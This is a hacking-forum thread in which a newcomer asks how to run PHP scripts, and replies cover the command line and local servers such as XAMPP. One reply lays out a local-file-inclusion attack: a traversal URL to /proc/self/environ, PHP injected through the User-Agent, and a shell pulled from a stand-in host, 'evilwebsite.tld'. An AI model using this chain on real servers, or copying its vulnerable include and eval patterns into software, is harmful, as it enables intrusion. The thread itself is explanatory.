php script question

A place where newbies can post without (much) fear of reprisal. All mission posts should still go in the applicable forum.
Forum rules
Older HTS users: Be nice to the new people.

NEW USERS: This is NOT the place to post about missions! Refer to "Missions" category.

php script question

Post by HaxJester on Thu Jan 10, 2013 3:31 am
([msg=72173]see php script question[/msg])

Is it possible to run php scripts be run without having to save them online first?
HaxJester
New User
New User
 
Posts: 1
Joined: Thu Jan 10, 2013 3:23 am
Blog: View Blog (0)


Re: php script question

Post by -Ninjex- on Thu Jan 10, 2013 3:50 am
([msg=72174]see Re: php script question[/msg])

HaxJester wrote:Is it possible to run php scripts be run without having to save them online first?



Of course, maybe research your question on google first.
If you are really confused, look into apache servers.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1248
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: php script question

Post by weekend hacker on Thu Jan 10, 2013 6:03 am
([msg=72175]see Re: php script question[/msg])

You can run php in various ways on whatever machine that has php installed. The main thing is that the code will run on a machine that has it installed, the actual location of the code doesn't matter all that much depending on the context.
You could for instance install php on your home machine and start from the command line like:
Code: Select all
php somephpfile.php

Or you could also have a webserver installed with php support and simply go to the appropriate url like:
Code: Select all
http://127.0.0.1/somephpfile.php

Or on a remote server with php installed there could be a php script that includes other php code and the php installed on that server has been configured to allow remote includes like:
Code: Select all
<?php include 'http://somewebsite.tld/somedir/somefile.php'; ?>

(note that somewebsite.tld/.... needs to show the content of that php file and not actually run it itself. it doesn't even really need to end in .php it might aswell be a .txt)
Or there might be some php code on a machine that allows you to evaluate php code and allows you to specify a string of php code like:
Code: Select all
<?php eval($_GET['code']); ?>

Now to throw all this together into a practical example.. There might be a php script somewhere that is vulnerable to a local file inclusion (lfi). It might look something like this:
Code: Select all
<?php include '/usr/local/www/'.$_GET['page'].'.php';

now we could change the 'page' get value to whatever we want fairly easy by just going to some url like:
Code: Select all
http://somewebsite.tld/vulnpage.php?page=../../../proc/self/environ%00

then the vuln page will try to include /proc/self/environ.(note the nullbyte at the end to get rid of that pesky .php)
Now if we ware to also change our useragent to something like:
Code: Select all
<?php include 'evilwebsite.tld/somephpshell.txt'; ?>

then the vuln page will include /proc/self/environ which for a web process also contains the user agent which will in turn be treated as php code and will include somephpshell.txt (assuming remote includes are turned on). if somephpshell.txt is the code for a random php shell then you now have a nice interface to whatever server that had the lfi as whatever user the webserver is running as.
Now if remote includes are not allowed then you could always turn your useragent into something like:
Code: Select all
<?php eval($_POST['evilcodez']); ?>

and set the post value of 'evilcodez' to the content of the shellscript. or alternativly you write a little something to get the shellscript from some server(http_get() comes to mind but if remote includes are disabled then they theres a big change that is disabled aswel).

There you have it, various ways of running php in all kinds of situations with the actual code being in all kinds of different places. Hope this helped.
<Yoda> if someone says something i don't like, i ban him, ban whoever defends him, and then ban the witnesses...
User avatar
weekend hacker
Administrator
Administrator
 
Posts: 192
Joined: Sun Apr 13, 2008 2:39 pm
Location: 127.0.0.1
Blog: View Blog (0)


Re: php script question

Post by Fehk on Thu Jan 10, 2013 11:59 am
([msg=72183]see Re: php script question[/msg])

On top of the numerous 'delivery methods' above, there are plenty of applications, guides and software to help you install, customize and run your own test server on your PC.

1. XAMPP, cross-platform apache/mysql/php & perl

http://www.webassist.com/support/docume ... indows.php (great allround usage)

2. WAMP, windows apache/mysql/php

http://www.wampserver.com/en/ (apache2, easy to work with, great customization)
http://www.easyphp.org/ (very easy :p use it myself on both laptop and pc)

3. LAMP, linux apache/mysql/php

Setting up a LAMP is a bit harder, since you have to do more manual work instead of clicking 'next' & 'finish', but it's very rewarding if you do set one up.

https://help.ubuntu.com/community/ApacheMySQLPHP (for ubuntu, a 'how-to')
http://www.redips.net/linux/lamp-setup/ (same thing)
User avatar
Fehk
New User
New User
 
Posts: 10
Joined: Tue Jan 08, 2013 10:44 pm
Blog: View Blog (0)



Return to NZone

Who is online

Users browsing this forum: No registered users and 0 guests